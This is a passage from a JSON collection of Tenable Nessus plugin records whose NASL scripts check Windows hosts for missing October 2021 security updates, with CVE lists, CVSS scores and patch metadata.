script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-40489\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2021-41340\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Win32k NtGdiResetDC Use After Free Local Privilege Elevation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/10/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/10/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/10/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS21-10';\nkbs = make_list(\n '5006715',\n '5006736'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(vista:'2') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'6.0',\n sp:2,\n rollup_date:'10_2021',\n bulletin:bulletin,\n rollup_kb_list:[5006736, 5006715])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-15T18:10:16", "description": "The remote Windows host is missing security update 5006732. It is, therefore, affected by multiple vulnerabilities.", "cvss3": {"score": 7.8, "vector": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2021-10-12T00:00:00", "type": "nessus", "title": "KB5006732: Windows Server 2012 Security Update (October 2021)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-26441", "CVE-2021-26442", "CVE-2021-36953", "CVE-2021-36970", "CVE-2021-38662", "CVE-2021-38663", "CVE-2021-40443", "CVE-2021-40449", "CVE-2021-40454", "CVE-2021-40455", "CVE-2021-40460", "CVE-2021-40463", "CVE-2021-40465", "CVE-2021-40466", "CVE-2021-40467", "CVE-2021-40469", "CVE-2021-40476", "CVE-2021-40477", "CVE-2021-40478", "CVE-2021-40488", "CVE-2021-40489", "CVE-2021-41331", "CVE-2021-41332", "CVE-2021-41335", "CVE-2021-41340", "CVE-2021-41343", "CVE-2021-41345"], "modified": "2022-01-26T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_OCT_5006732.NASL", "href": "https://www.tenable.com/plugins/nessus/154036", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n\n#\n# The descriptive text and package checks in this plugin were\n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(154036);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/01/26\");\n\n script_cve_id(\n \"CVE-2021-26441\",\n \"CVE-2021-26442\",\n \"CVE-2021-36953\",\n \"CVE-2021-36970\",\n \"CVE-2021-38662\",\n \"CVE-2021-38663\",\n \"CVE-2021-40443\",\n \"CVE-2021-40449\",\n \"CVE-2021-40454\",\n \"CVE-2021-40455\",\n \"CVE-2021-40460\",\n \"CVE-2021-40463\",\n \"CVE-2021-40465\",\n \"CVE-2021-40466\",\n \"CVE-2021-40467\",\n \"CVE-2021-40469\",\n \"CVE-2021-40476\",\n \"CVE-2021-40477\",\n \"CVE-2021-40478\",\n \"CVE-2021-40488\",\n \"CVE-2021-40489\",\n \"CVE-2021-41331\",\n \"CVE-2021-41332\",\n \"CVE-2021-41335\",\n \"CVE-2021-41340\",\n \"CVE-2021-41343\",\n \"CVE-2021-41345\"\n );\n script_xref(name:\"IAVA\", value:\"2021-A-0472-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0475-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/12/01\");\n script_xref(name:\"MSKB\", value:\"5006732\");\n script_xref(name:\"MSKB\", value:\"5006739\");\n script_xref(name:\"MSFT\", value:\"MS21-5006732\");\n script_xref(name:\"MSFT\", value:\"MS21-5006739\");\n\n script_name(english:\"KB5006732: Windows Server 2012 Security Update (October 2021)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5006732. It is, therefore, affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Update 5006732 or apply Cumulative Update 5006739\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-41345\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Win32k NtGdiResetDC Use After Free Local Privilege Elevation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/10/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/10/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/10/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS21-10';\nkbs = make_list(\n '5006739',\n '5006732'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win8:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'6.2',\n sp:0,\n rollup_date:'10_2021',\n bulletin:bulletin,\n rollup_kb_list:[5006739, 5006732])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-15T16:47:10", "description": "The remote Windows host is missing security update 5006729. It is, therefore, affected by multiple vulnerabilities.", "cvss3": {"score": 7.8, "vector": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2021-10-12T00:00:00", "type": "nessus", "title": "KB5006729: Windows Server 2012 R2 Security Update (October 2021)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-26441", "CVE-2021-26442", "CVE-2021-36953", "CVE-2021-36970", "CVE-2021-38662", "CVE-2021-38663", "CVE-2021-40443", "CVE-2021-40449", "CVE-2021-40454", "CVE-2021-40455", "CVE-2021-40460", "CVE-2021-40463", "CVE-2021-40465", "CVE-2021-40466", "CVE-2021-40467", "CVE-2021-40469", "CVE-2021-40476", "CVE-2021-40477", "CVE-2021-40478", "CVE-2021-40488", "CVE-2021-40489", "CVE-2021-41331", "CVE-2021-41332", "CVE-2021-41335", "CVE-2021-41340", "CVE-2021-41343", "CVE-2021-41345"], "modified": "2022-01-26T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_OCT_5006729.NASL", "href": "https://www.tenable.com/plugins/nessus/154040", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n\n#\n# The descriptive text and package checks in this plugin were\n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(154040);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/01/26\");\n\n script_cve_id(\n \"CVE-2021-26441\",\n \"CVE-2021-26442\",\n \"CVE-2021-36953\",\n \"CVE-2021-36970\",\n \"CVE-2021-38662\",\n \"CVE-2021-38663\",\n \"CVE-2021-40443\",\n \"CVE-2021-40449\",\n \"CVE-2021-40454\",\n \"CVE-2021-40455\",\n \"CVE-2021-40460\",\n \"CVE-2021-40463\",\n \"CVE-2021-40465\",\n \"CVE-2021-40466\",\n \"CVE-2021-40467\",\n \"CVE-2021-40469\",\n \"CVE-2021-40476\",\n \"CVE-2021-40477\",\n \"CVE-2021-40478\",\n \"CVE-2021-40488\",\n \"CVE-2021-40489\",\n \"CVE-2021-41331\",\n \"CVE-2021-41332\",\n \"CVE-2021-41335\",\n \"CVE-2021-41340\",\n \"CVE-2021-41343\",\n \"CVE-2021-41345\"\n );\n script_xref(name:\"IAVA\", value:\"2021-A-0472-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0475-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/12/01\");\n script_xref(name:\"MSKB\", value:\"5006714\");\n script_xref(name:\"MSKB\", value:\"5006729\");\n script_xref(name:\"MSFT\", value:\"MS21-5006714\");\n script_xref(name:\"MSFT\", value:\"MS21-5006729\");\n\n script_name(english:\"KB5006729: Windows Server 2012 R2 Security Update (October 2021)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5006729. It is, therefore, affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Update 5006729 or apply Cumulative Update 5006714\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-41345\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Win32k NtGdiResetDC Use After Free Local Privilege Elevation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/10/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/10/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/10/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS21-10';\nkbs = make_list(\n '5006714',\n '5006729'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win81:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'6.3',\n sp:0,\n rollup_date:'10_2021',\n bulletin:bulletin,\n rollup_kb_list:[5006714, 5006729])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-15T18:09:35", "description": "The remote Windows host is missing security update 5006675. It is, therefore, affected by multiple vulnerabilities", "cvss3": {"score": 8.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2021-10-12T00:00:00", "type": "nessus", "title": "KB5006675: WWindows 10 version 1507 LTS Security Update (October 2021)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-26441", "CVE-2021-26442", "CVE-2021-36953", "CVE-2021-36970", "CVE-2021-38662", "CVE-2021-38663", "CVE-2021-40443", "CVE-2021-40449", "CVE-2021-40454", "CVE-2021-40455", "CVE-2021-40460", "CVE-2021-40463", "CVE-2021-40465", "CVE-2021-40466", "CVE-2021-40467", "CVE-2021-40470", "CVE-2021-40476", "CVE-2021-40477", "CVE-2021-40478", "CVE-2021-40488", "CVE-2021-40489", "CVE-2021-41331", "CVE-2021-41332", "CVE-2021-41335", "CVE-2021-41338", "CVE-2021-41340", "CVE-2021-41342", "CVE-2021-41343", "CVE-2021-41345", "CVE-2021-41347"], "modified": "2022-05-09T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_OCT_5006675.NASL", "href": "https://www.tenable.com/plugins/nessus/154041", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n\n#\n# The descriptive text and package checks in this plugin were\n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(154041);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/05/09\");\n\n script_cve_id(\n \"CVE-2021-26441\",\n \"CVE-2021-26442\",\n \"CVE-2021-36953\",\n \"CVE-2021-36970\",\n \"CVE-2021-38662\",\n \"CVE-2021-38663\",\n \"CVE-2021-40443\",\n \"CVE-2021-40449\",\n \"CVE-2021-40454\",\n \"CVE-2021-40455\",\n \"CVE-2021-40460\",\n \"CVE-2021-40463\",\n \"CVE-2021-40465\",\n \"CVE-2021-40466\",\n \"CVE-2021-40467\",\n \"CVE-2021-40470\",\n \"CVE-2021-40476\",\n \"CVE-2021-40477\",\n \"CVE-2021-40478\",\n \"CVE-2021-40488\",\n \"CVE-2021-40489\",\n \"CVE-2021-41331\",\n \"CVE-2021-41332\",\n \"CVE-2021-41335\",\n \"CVE-2021-41338\",\n \"CVE-2021-41340\",\n \"CVE-2021-41342\",\n \"CVE-2021-41343\",\n \"CVE-2021-41345\",\n \"CVE-2021-41347\"\n );\n script_xref(name:\"IAVA\", value:\"2021-A-0472-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0475-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/12/01\");\n script_xref(name:\"MSKB\", value:\"5006675\");\n script_xref(name:\"MSFT\", value:\"MS21-5006675\");\n\n script_name(english:\"KB5006675: WWindows 10 version 1507 LTS Security Update (October 2021)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5006675. It is, therefore, affected by multiple vulnerabilities\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Update 5006675\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-41345\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2021-41342\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Win32k NtGdiResetDC Use After Free Local Privilege Elevation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/10/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/10/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/10/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS21-10';\nkbs = make_list(\n '5006675'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'10',\n os_build:10240,\n rollup_date:'10_2021',\n bulletin:bulletin,\n rollup_kb_list:[5006675])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-15T18:09:48", "description": "The remote Windows host is missing security update 5006669.\nIt is, therefore, affected by multiple vulnerabilities:\n\n - A denial of service (DoS) vulnerability. An attacker can exploit this issue to cause the affected component to deny system or application services. (CVE-2021-36953, CVE-2021-40463)\n\n - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges.\n (CVE-2021-26441, CVE-2021-26442, CVE-2021-40443, CVE-2021-40449, CVE-2021-40466, CVE-2021-40467, CVE-2021-40470, CVE-2021-40476, CVE-2021-40477, CVE-2021-40478, CVE-2021-40488, CVE-2021-40489, CVE-2021-41335, CVE-2021-41345, CVE-2021-41347)\n\n - A session spoofing vulnerability exists. An attacker can exploit this to perform actions with the privileges of another user. (CVE-2021-36970, CVE-2021-40455, CVE-2021-41361)\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. (CVE-2021-40465, CVE-2021-40469, CVE-2021-41331, CVE-2021-41340, CVE-2021-41342)\n\n - An information disclosure vulnerability. An attacker can exploit this to disclose potentially sensitive information. (CVE-2021-38662, CVE-2021-38663, CVE-2021-40454, CVE-2021-41332, CVE-2021-41343)\n\n - A security feature bypass vulnerability exists. An attacker can exploit this and bypass the security feature and perform unauthorized actions compromising the integrity of the system/application.\n (CVE-2021-40460, CVE-2021-41337, CVE-2021-41338)", "cvss3": {"score": 8.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2021-10-12T00:00:00", "type": "nessus", "title": "KB5006669: Windows 10 Version 1607 and Windows Server 2016 Security Update (October 2021)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-26441", "CVE-2021-26442", "CVE-2021-36953", "CVE-2021-36970", "CVE-2021-38662", "CVE-2021-38663", "CVE-2021-40443", "CVE-2021-40449", "CVE-2021-40454", "CVE-2021-40455", "CVE-2021-40460", "CVE-2021-40463", "CVE-2021-40465", "CVE-2021-40466", "CVE-2021-40467", "CVE-2021-40469", "CVE-2021-40470", "CVE-2021-40476", "CVE-2021-40477", "CVE-2021-40478", "CVE-2021-40488", "CVE-2021-40489", "CVE-2021-41331", "CVE-2021-41332", "CVE-2021-41335", "CVE-2021-41337", "CVE-2021-41338", "CVE-2021-41340", "CVE-2021-41342", "CVE-2021-41343", "CVE-2021-41345", "CVE-2021-41347", "CVE-2021-41361"], "modified": "2022-05-09T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_OCT_5006669.NASL", "href": "https://www.tenable.com/plugins/nessus/154034", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n\n#\n# The descriptive text and package checks in this plugin were\n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(154034);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/05/09\");\n\n script_cve_id(\n \"CVE-2021-26441\",\n \"CVE-2021-26442\",\n \"CVE-2021-36953\",\n \"CVE-2021-36970\",\n \"CVE-2021-38662\",\n \"CVE-2021-38663\",\n \"CVE-2021-40443\",\n \"CVE-2021-40449\",\n \"CVE-2021-40454\",\n \"CVE-2021-40455\",\n \"CVE-2021-40460\",\n \"CVE-2021-40463\",\n \"CVE-2021-40465\",\n \"CVE-2021-40466\",\n \"CVE-2021-40467\",\n \"CVE-2021-40469\",\n \"CVE-2021-40470\",\n \"CVE-2021-40476\",\n \"CVE-2021-40477\",\n \"CVE-2021-40478\",\n \"CVE-2021-40488\",\n \"CVE-2021-40489\",\n \"CVE-2021-41331\",\n \"CVE-2021-41332\",\n \"CVE-2021-41335\",\n \"CVE-2021-41337\",\n \"CVE-2021-41338\",\n \"CVE-2021-41340\",\n \"CVE-2021-41342\",\n \"CVE-2021-41343\",\n \"CVE-2021-41345\",\n \"CVE-2021-41347\",\n \"CVE-2021-41361\"\n );\n script_xref(name:\"IAVA\", value:\"2021-A-0472-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0475-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/12/01\");\n script_xref(name:\"MSKB\", value:\"5006669\");\n script_xref(name:\"MSFT\", value:\"MS21-5006669\");\n\n script_name(english:\"KB5006669: Windows 10 Version 1607 and Windows Server 2016 Security Update (October 2021)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5006669.\nIt is, therefore, affected by multiple vulnerabilities:\n\n - A denial of service (DoS) vulnerability. An attacker can\n exploit this issue to cause the affected component to\n deny system or application services. (CVE-2021-36953,\n CVE-2021-40463)\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2021-26441, CVE-2021-26442, CVE-2021-40443,\n CVE-2021-40449, CVE-2021-40466, CVE-2021-40467,\n CVE-2021-40470, CVE-2021-40476, CVE-2021-40477,\n CVE-2021-40478, CVE-2021-40488, CVE-2021-40489,\n CVE-2021-41335, CVE-2021-41345, CVE-2021-41347)\n\n - A session spoofing vulnerability exists. An attacker can\n exploit this to perform actions with the privileges of\n another user. (CVE-2021-36970, CVE-2021-40455,\n CVE-2021-41361)\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2021-40465,\n CVE-2021-40469, CVE-2021-41331, CVE-2021-41340,\n CVE-2021-41342)\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. (CVE-2021-38662, CVE-2021-38663,\n CVE-2021-40454, CVE-2021-41332, CVE-2021-41343)\n\n - A security feature bypass vulnerability exists. An\n attacker can exploit this and bypass the security\n feature and perform unauthorized actions compromising\n the integrity of the system/application.\n (CVE-2021-40460, CVE-2021-41337, CVE-2021-41338)\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Update 5006669\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-41345\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2021-41342\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Win32k NtGdiResetDC Use After Free Local Privilege Elevation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/10/12\");\n 